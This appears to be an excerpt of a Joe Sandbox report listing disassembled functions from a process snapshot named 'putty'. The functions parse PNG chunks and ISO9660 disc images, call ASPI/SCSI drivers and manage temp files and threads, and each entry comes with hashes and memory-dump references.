Opcode Fuzzy Hash: c26c7b3ccae67c9d954957b9b29f65f9218725189a27c08d09d4ac05f33bc8ad
Instruction Fuzzy Hash: 749131B6E40219ABDB10DFE9EC85FEFF7BCAF88710F10455AE610E7250D67599408BA0

Function 00345160 Relevance: 51.1, APIs: 3, Strings: 26, Instructions: 360COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0034557C
_free.LIBCMT ref: 00345531

Part of subcall function 003B93AA: HeapFree.KERNEL32(00000000,00000000,?,003B9472,?), ref: 003B93C0
Part of subcall function 003B93AA: GetLastError.KERNEL32(?,?,003B9472,?), ref: 003B93D2

_free.LIBCMT ref: 003455AC

Strings

EMIt, xrefs: 003453E1
LACs, xrefs: 00345332
BGRs, xrefs: 0034537E
PCCi, xrefs: 00345398
TLPs, xrefs: 003453B0
DNEI, xrefs: 003451AB
tXEt, xrefs: 003453CA
TADI, xrefs: 00345247
SNRt, xrefs: 003453F8
DGKb, xrefs: 0034529A
sYHp, xrefs: 0034534C
Too many IDATs found, xrefs: 00345218, 00345269, 0034546B
AMAg, xrefs: 003452CA
tXTz, xrefs: 0034540D
ETLP, xrefs: 00345280
TADI, xrefs: 003451F6
LACp, xrefs: 00345318
TIBs, xrefs: 00345366
MRHc, xrefs: 003452B2
ETLP, xrefs: 00345232
TSIh, xrefs: 003452E4
RDHI, xrefs: 0034518F
tXTi, xrefs: 00345426
No image in file, xrefs: 00345460
sFFo, xrefs: 003452FE
Incorrect IEND chunk length, xrefs: 003451D0

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: AMAg$BGRs$DGKb$DNEI$EMIt$ETLP$ETLP$Incorrect IEND chunk length$LACp$LACs$MRHc$No image in file$PCCi$RDHI$SNRt$TADI$TADI$TIBs$TLPs$TSIh$Too many IDATs found$sFFo$sYHp$tXEt$tXTi$tXTz
API String ID: 776569668-2525798497
Opcode ID: 67d763dd1ecc8064a015d2a928e4c05b861643eaafcde7a0269c08400dac1381
Instruction ID: 090809fa8ef148a86c9d253b95a46aaacc8cf1aee6612ebb4c31fcf85d0300f5
Opcode Fuzzy Hash: 67d763dd1ecc8064a015d2a928e4c05b861643eaafcde7a0269c08400dac1381
Instruction Fuzzy Hash: 88B13A75F00E1497CF239E59C880BAEB3EA6F95701F25414AF90A4F342DA71BE818797

Function 0032F0B0 Relevance: 30.1, APIs: 2, Strings: 15, Instructions: 352COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032F14F

Strings

Error: Unable to read ISO9660 file system., xrefs: 0032F17D
Error: Unable to read ISO9660 primary volume descriptor., xrefs: 0032F19C
%, xrefs: 0032F283
Found Joliet file system extension., xrefs: 0032F3E8
Error: Bad primary volume descriptor version., xrefs: 0032F1CE
/, xrefs: 0032F28D
Error: Bad primary volume descriptor structure version., xrefs: 0032F1EC
Length of root directory extent: %u., xrefs: 0032F339
Error: Unable to read additional ISO9660 volume descriptor., xrefs: 0032F3D4
IsoReader::Read, xrefs: 0032F101
Error: Invalid ISO9660 file system., xrefs: 0032F136
Error: Primary volume decsriptor not found at sector 16., xrefs: 0032F1B3
Error: Failed to read directory entry at sector: %u., xrefs: 0032F48C, 0032F509
Error: Bad primary volume descriptor identifer., xrefs: 0032F51F
Location of root directory extent: %u., xrefs: 0032F326

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset
String ID: Error: Bad primary volume descriptor identifer.$ Error: Bad primary volume descriptor structure version.$ Error: Bad primary volume descriptor version.$ Error: Failed to read directory entry at sector: %u.$ Error: Invalid ISO9660 file system.$ Error: Primary volume decsriptor not found at sector 16.$ Error: Unable to read ISO9660 file system.$ Error: Unable to read ISO9660 primary volume descriptor.$ Error: Unable to read additional ISO9660 volume descriptor.$ Found Joliet file system extension.$ Length of root directory extent: %u.$ Location of root directory extent: %u.$%$/$IsoReader::Read
API String ID: 2102423945-2619616456
Opcode ID: a0e0d7cc41ae9a53886559c66ea6da2d262acdd273a7d4f0f7b2ee3c17ef1700
Instruction ID: 25221ded73e7e0b18ec8b8147fb4c2b14b739e673f4ddcd72756941c587cc3d9
Opcode Fuzzy Hash: a0e0d7cc41ae9a53886559c66ea6da2d262acdd273a7d4f0f7b2ee3c17ef1700
Instruction Fuzzy Hash: E0D1F8746083909FC726DF29D890BABB7F5AFC9300F158A6DF5C997381C674A901CB92

Function 00327F60 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 216stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0032807C
_memset.LIBCMT ref: 0032808B
_memset.LIBCMT ref: 003280A0
lstrlenW.KERNEL32(?,?,00000021,00000000,00000000), ref: 003280BF
AreFileApisANSI.KERNEL32(00000000,?,00000001), ref: 003280CC
WideCharToMultiByte.KERNEL32(00000001), ref: 003280D8

Strings

, xrefs: 00328010
, xrefs: 00328055

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _memset$ApisByteCharFileMultiWidelstrlen
String ID: $
API String ID: 740858178-3032137957
Opcode ID: 6ac5e54f2b2c0871d6b3312c8fa7d7aa4cd1c4490f3faf0cd9e987201a96fcb2
Instruction ID: 94629c5825db8fb034e7fa7cedee0500c29ad908f1e5167d4b8d6019712abece
Opcode Fuzzy Hash: 6ac5e54f2b2c0871d6b3312c8fa7d7aa4cd1c4490f3faf0cd9e987201a96fcb2
Instruction Fuzzy Hash: 6D816F71A45219AFDB25DF68DC85FE9B7B9FF48700F008599E509E7280DB70AE848F90

Function 003425A0 Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 172synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00342614
_memmove.LIBCMT ref: 0034264E
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0034267C
ResetEvent.KERNEL32(00000000), ref: 00342685
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003426A1
CloseHandle.KERNEL32(00000000), ref: 003426A8
GetLastError.KERNEL32 ref: 003426BA

Part of subcall function 00342360: LoadLibraryW.KERNEL32(wnaspi32.dll), ref: 00342365

Strings

H, xrefs: 0034266A
[aspidriver]: > ascq: 0x%.2x, xrefs: 00342780
[aspidriver]: > cdb: , xrefs: 00342709
[aspidriver]: > sense key: 0x%x, xrefs: 00342760
0x%.2x, xrefs: 0034272B
[aspidriver]: SendASPI32Command failed (0x%.2x, %d)., xrefs: 003426C6
,0x%.2x, xrefs: 0034273A
[aspidriver]: > asc: 0x%.2x, xrefs: 00342770
[aspidriver]: scsi command failed (0x%.2x)., xrefs: 003426FE

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Event$CloseCreateErrorHandleLastLibraryLoadObjectResetSingleWait_memmove_memset
String ID: ,0x%.2x$0x%.2x$H$[aspidriver]: > asc: 0x%.2x$[aspidriver]: > ascq: 0x%.2x$[aspidriver]: > cdb: $[aspidriver]: > sense key: 0x%x$[aspidriver]: SendASPI32Command failed (0x%.2x, %d).$[aspidriver]: scsi command failed (0x%.2x).
API String ID: 590137113-2612208981
Opcode ID: 1f068f04e320d7b185785e5af6266f799d9ceff99f370d78461836e7e247a398
Instruction ID: 3975d0b7626f150fa36697fbedd066f617c5da8500c81435da8640531dc7a7e3
Opcode Fuzzy Hash: 1f068f04e320d7b185785e5af6266f799d9ceff99f370d78461836e7e247a398
Instruction Fuzzy Hash: 18513531904388ABDB16CBA8DC44BFEBFF4AF56300F49415AF9857F282CA746954CB61

Function 0034A4EE Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 356COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0034A521

Strings

Unrecognized equation type for pCAL chunk, xrefs: 0034A703
Call to NULL read function, xrefs: 0034A890
No memory for pCAL params, xrefs: 0034A764
Invalid pCAL data, xrefs: 0034A5C1, 0034A79B
No memory for pCAL purpose, xrefs: 0034A53E
Invalid pCAL parameters for equation type, xrefs: 0034A6AF

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free
String ID: Call to NULL read function$Invalid pCAL data$Invalid pCAL parameters for equation type$No memory for pCAL params$No memory for pCAL purpose$Unrecognized equation type for pCAL chunk
API String ID: 269201875-3568182289
Opcode ID: b7d84a3c527b998851eb55da2c7b9911dfdc13d3e8db3abb414f3417d01ed99f
Instruction ID: 1b7852defe5a288208361b4a664dc7d081440426c834650decabc6fc96f99e9b
Opcode Fuzzy Hash: b7d84a3c527b998851eb55da2c7b9911dfdc13d3e8db3abb414f3417d01ed99f
Instruction Fuzzy Hash: 0BB18B71A48A440BDB278BA8DC917FFBBE9EF81310F0901AEE9598F341D7257905C762

Function 003506F0 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 175stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000000,?,?,?,00000000), ref: 0035070E
lstrlenA.KERNEL32(00000000), ref: 0035073B
_memmove.LIBCMT ref: 003507C3
lstrlenA.KERNEL32(00000001), ref: 003507F3
_memmove.LIBCMT ref: 00350823
_memset.LIBCMT ref: 0035085A
lstrlenA.KERNEL32 ref: 00350877
_memmove.LIBCMT ref: 003508AE

Strings

Insufficient memory for pCAL purpose, xrefs: 003507A2
Invalid format for pCAL parameter, xrefs: 003507B2
Insufficient memory for pCAL parameter, xrefs: 003508D3
Insufficient memory for pCAL units, xrefs: 0035080D
Invalid pCAL equation type, xrefs: 003508E3
Insufficient memory for pCAL params, xrefs: 00350846

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: lstrlen$_memmove$_memset
String ID: Insufficient memory for pCAL parameter$Insufficient memory for pCAL params$Insufficient memory for pCAL purpose$Insufficient memory for pCAL units$Invalid format for pCAL parameter$Invalid pCAL equation type
API String ID: 2111831828-2137164658
Opcode ID: 77d073a7db6dcb08ae042de7a889d98a2a35957787b8856b2bdf331dd29a70dc
Instruction ID: a43e3f3e66f0cbc91b9c1f9d1c6d81bf7731e9f9f4165aebb90b3a8155e12382
Opcode Fuzzy Hash: 77d073a7db6dcb08ae042de7a889d98a2a35957787b8856b2bdf331dd29a70dc
Instruction Fuzzy Hash: 0E519035A042099BCB16DFA8D841FEE3BA6EF88305F1541A9ED089F351DB31E945CBE1

Function 00324410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161stringfileCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000F6,?,D747BB9A), ref: 0032445B
GetTempFileNameW.KERNEL32(?,tmp,00000000,?), ref: 00324482
lstrcpyW.KERNEL32(?,?), ref: 0032449A
lstrcatW.KERNEL32(?,file), ref: 003244B2
_rand.LIBCMT ref: 003244B4
lstrcatW.KERNEL32(?,?), ref: 003244D0
lstrcatW.KERNEL32(?,.tmp), ref: 003244DE
GetFileAttributesW.KERNEL32(?,?,?), ref: 00324543
DeleteFileW.KERNEL32(?), ref: 00324567
std::exception::exception.LIBCMT ref: 0032460B

Part of subcall function 003B947D: std::exception::_Copy_str.LIBCMT ref: 003B9498

__CxxThrowException@8.LIBCMT ref: 00324626

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

Strings

.tmp, xrefs: 003244D2
file, xrefs: 003244A6
tmp, xrefs: 00324476

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Filelstrcat$Temp$AttributesCopy_strDeleteExceptionException@8NamePathRaiseThrow_randlstrcpystd::exception::_std::exception::exception
String ID: .tmp$file$tmp
API String ID: 243532567-151272801
Opcode ID: f9c2abb1fdf7053807c0e24b20afa15a94e9159bac4144ec1b539e529f4ca41c
Instruction ID: 6cda38ddc7fc3634d1cf4b31a4a524544ce08e85367452b0bc80cf0b72e4f0f1
Opcode Fuzzy Hash: f9c2abb1fdf7053807c0e24b20afa15a94e9159bac4144ec1b539e529f4ca41c
Instruction Fuzzy Hash: 0651C6B19003289FCB21DF64DC85BEEB7B8FF48704F10459AE64997240E734AA48CF55

Function 003BD1F1 Relevance: 24.1, APIs: 16, Instructions: 95COMMONLIBRARYCODE

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 003BD20A

Part of subcall function 003BE3A6: Sleep.KERNEL32(00000000), ref: 003BE3CE

__calloc_crt.LIBCMT ref: 003BD22E
_free.LIBCMT ref: 003BD23C
__calloc_crt.LIBCMT ref: 003BD24A
_free.LIBCMT ref: 003BD25A
_free.LIBCMT ref: 003BD260
__copytlocinfo_nolock.LIBCMT ref: 003BD26F
__setlocale_nolock.LIBCMT ref: 003BD27C
___removelocaleref.LIBCMT ref: 003BD288
___freetlocinfo.LIBCMT ref: 003BD28F
_free.LIBCMT ref: 003BD295
__setmbcp_nolock.LIBCMT ref: 003BD2A7
_free.LIBCMT ref: 003BD2B5
___removelocaleref.LIBCMT ref: 003BD2BC
___freetlocinfo.LIBCMT ref: 003BD2C3
_free.LIBCMT ref: 003BD2C9

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 888903860-0
Opcode ID: c722ced0014fdc0dcb55e10cb744bcc10c9935425c720672203930936a9827b3
Instruction ID: ae56f5cf33abd7db04f27630e190da0a8b90d0036f9f8ede7973c11d467cfdd4
Opcode Fuzzy Hash: c722ced0014fdc0dcb55e10cb744bcc10c9935425c720672203930936a9827b3
Instruction Fuzzy Hash: 4421E6351086019BD7377B14D802EDAB7E5DF91718B21482EFB889ED91EF32DC409B50

Function 0033D6F0 Relevance: 21.4, APIs: 4, Strings: 8, Instructions: 390COMMON

Download Yara Rule

APIs

Part of subcall function 003230A0: lstrlenW.KERNEL32(?,D747BB9A,?,?,?,Cannot close previously open file handle.), ref: 003230F4
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 00323114
Part of subcall function 003230A0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,00000000,?,?,?,Cannot close previously open file handle.), ref: 0032315B

__CxxThrowException@8.LIBCMT ref: 0033D75F

Part of subcall function 003B9164: RaiseException.KERNEL32(Z 2,?,D747BB9A,003DD6C4,0032205A,?,00402D5C,?,D747BB9A), ref: 003B91A6

__CxxThrowException@8.LIBCMT ref: 0033D953
__CxxThrowException@8.LIBCMT ref: 0033D9F1
__CxxThrowException@8.LIBCMT ref: 0033DB78

Strings

Root folder is larger than ISO9660 supports, current size is , xrefs: 0033DB22
Memory for ISO9660 path table has not been allocated., xrefs: 0033D741
to , xrefs: 0033D97D
bytes., xrefs: 0033DAF9
Invalid boot data sector range of , xrefs: 0033D98C
of directory entries., xrefs: 0033D8E9
Invalid start sector , xrefs: 0033D8F5
Wrote El Torito boot record at sector %I64u., xrefs: 0033DA79

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: Exception@8Throw$ByteCharMultiWide$ExceptionRaiselstrlen
String ID: Wrote El Torito boot record at sector %I64u.$ bytes.$ of directory entries.$ to $Invalid boot data sector range of $Invalid start sector $Memory for ISO9660 path table has not been allocated.$Root folder is larger than ISO9660 supports, current size is
API String ID: 185245194-2655967253
Opcode ID: d4f333ca586425311ba4528f2d101a4cbd8ddefb4537879fad0c19879165ed69
Instruction ID: bc735304bace781b052e9a1385023b9afd7cb05ae304023fe98a36c96b937030
Opcode Fuzzy Hash: d4f333ca586425311ba4528f2d101a4cbd8ddefb4537879fad0c19879165ed69
Instruction Fuzzy Hash: C6F18BB5604301AFC315DF58D885E9BB7E8BF88314F048A2DF58997362DB34E945CBA2

Function 00326060 Relevance: 21.1, APIs: 14, Instructions: 88synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326072
GetCurrentThreadId.KERNEL32 ref: 00326081
SetEvent.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326092
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 0032609E
TerminateThread.KERNEL32(?,000000FE,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260AA
CloseHandle.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260BA
CloseHandle.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260CF
CloseHandle.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260DC
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 003260EB
GetExitCodeProcess.KERNEL32(?,?), ref: 003260F9
CloseHandle.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 0032610D
ResetEvent.KERNEL32(?,?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326120
ResetEvent.KERNEL32(?,?,00000000,?,?,00325FBE,?,?,?,\-@), ref: 00326126
ReleaseMutex.KERNEL32(?,?,?,00325FBE,?,?,?,\-@), ref: 00326139

Memory Dump Source

Source File: 0000000D.00000002.1999160210.0000000000321000.00000020.00000001.01000000.00000008.sdmp, Offset: 00320000, based on PE: true

Associated: 0000000D.00000002.1999140325.0000000000320000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999217107.00000000003DD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999285870.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999317915.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999335055.000000000040D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000413000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000474000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.00000000004A4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.0000000000544000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.1999353857.000000000057C000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_320000_putty.jbxd

Similarity

API ID: CloseHandle$EventObjectSingleWait$ResetThread$CodeCurrentExitMutexProcessReleaseTerminate
String ID:
API String ID: 1416950961-0
Opcode ID: a8a1d1cc17d31c8e8962a7f6c80841670471e8518d349705d53e57d4160e667d
Instruction ID: 232431b894c224ae7e5762f820868687537538fac90a75df8124013dd3393c57
Opcode Fuzzy Hash: a8a1d1cc17d31c8e8962a7f6c80841670471e8518d349705d53e57d4160e667d
Instruction Fuzzy Hash: DB31F4B25057529B87319FA6EC84816F7FDBF883203118F1EE56283AA0CB34F8458B60

